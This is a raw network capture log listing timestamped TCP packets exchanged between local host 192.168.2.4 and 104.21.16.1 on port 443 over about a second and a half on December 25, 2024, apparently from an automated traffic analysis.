                                                                                                                                  Dec 25, 2024 15:09:20.179872990 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.179927111 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.190642118 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.190658092 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.190715075 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.190742016 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.190783978 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.190907955 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.195717096 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.195733070 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.195792913 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.195806980 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.195852995 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.197026968 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.281128883 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.281143904 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.281225920 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.281248093 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.281308889 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.351521969 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.351541042 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.351614952 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.351655960 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.351717949 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.356060028 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.356082916 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.356132030 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.356147051 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.356183052 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.356183052 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.361556053 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.361577988 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.361629963 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.361660004 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.361685991 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.361804962 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.367167950 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.367186069 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.367254972 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.367275953 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.367302895 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.367512941 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.372054100 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.372070074 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.372153044 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.372167110 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.372222900 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.383028984 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.383044958 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.383116961 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.383116961 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.383137941 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.383205891 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.387939930 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.387958050 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.388039112 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.388063908 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.388119936 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.472815990 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.472832918 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.472904921 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.472944975 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.472974062 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.472995043 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.543529987 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.543544054 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.543649912 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.543679953 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.543839931 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.548115969 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.548134089 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.548207045 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.548233032 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.548279047 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.553724051 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.553740978 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.553839922 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.553872108 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.553932905 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.559190989 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.559225082 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.559293985 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.559309959 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.559385061 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.564841986 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.564857006 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.564924002 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.564939022 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.564996004 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.575486898 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.575505972 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.575583935 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.575596094 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.575741053 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.580519915 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.580537081 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.580600977 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.580621004 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.580666065 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.685101986 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.685121059 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.685208082 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.685260057 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.685318947 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.735613108 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.735630989 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.735749960 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.735793114 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.735866070 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.741784096 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.741811037 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.746120930 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.746134043 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.746288061 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.746324062 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.746340990 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.746396065 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.746409893 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.746504068 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.748354912 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.748682022 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.753732920 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.753747940 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.753843069 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.753859997 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.757971048 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.757992029 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.758048058 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.758078098 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.758115053 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.780189991 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.780205965 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.780283928 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.780312061 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.785680056 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.785700083 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.785792112 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.785813093 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.836913109 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.878729105 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.878743887 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.878791094 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.878825903 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.878984928 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.878985882 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.879065037 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.879132986 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.930608034 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.930624962 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.930845022 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.930917025 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.930979013 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.935381889 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.935395956 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.935478926 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.935502052 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.935554028 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.940716028 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.940731049 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.940810919 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.940828085 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.940886021 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.946306944 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.946321011 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.946397066 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.946412086 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.946460962 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.951293945 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.951308966 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.951447964 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.951462984 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.951529980 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.973078966 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.973094940 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.973210096 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.973244905 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.973412037 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.978827000 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.978844881 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.978913069 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:20.978938103 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:20.978997946 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.076457977 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.076473951 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.076561928 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.076582909 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.076657057 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.128906965 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.128923893 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.128995895 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.129031897 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.129086971 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.134974003 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.134989023 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.135061026 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.135093927 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.135171890 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.140436888 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.140451908 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.140527964 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.140547037 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.140600920 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.146111965 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.146126032 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.146190882 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.146207094 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.146260023 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.150985003 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.150999069 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.151067972 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.151084900 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.151153088 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.176646948 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.176662922 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.176733017 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.176747084 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.176773071 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.176795006 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.181557894 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.181572914 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.181660891 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.181678057 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.181806087 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.287746906 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.287803888 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.287859917 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.287903070 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.287936926 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.287959099 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.342292070 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.342349052 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.342406988 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.342431068 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.342459917 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.342485905 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.349426985 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.349473000 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.349519968 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.349534988 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.349565029 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.349606991 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.355235100 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.355283976 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.355335951 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.355351925 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.355429888 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.355473042 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.360044956 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.360109091 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.360136986 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.360165119 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.360198021 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.360219955 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.365643024 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.365694046 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.365735054 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.365777016 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.365808010 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.365853071 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.370973110 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.371017933 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.371047974 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.371062994 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.371081114 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.371104956 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.376538992 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.376585007 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.376621008 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.376629114 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.376657963 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.376672983 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.479804993 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.479851961 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.479895115 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.479932070 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.479953051 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.479971886 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.534822941 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.534868956 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.534925938 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.534940958 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.534970045 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.534985065 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.541904926 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.541949987 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.541981936 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.541999102 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.542013884 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.542038918 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.546830893 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.546874046 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.546905994 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.546914101 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.546941042 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.546952963 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.552442074 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.552484989 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.552516937 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.552524090 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.552550077 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.552561998 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.557981968 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.558043957 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.558062077 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:21.558070898 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:21.558104038 CET49734443192.168.2.4104.21.16.1
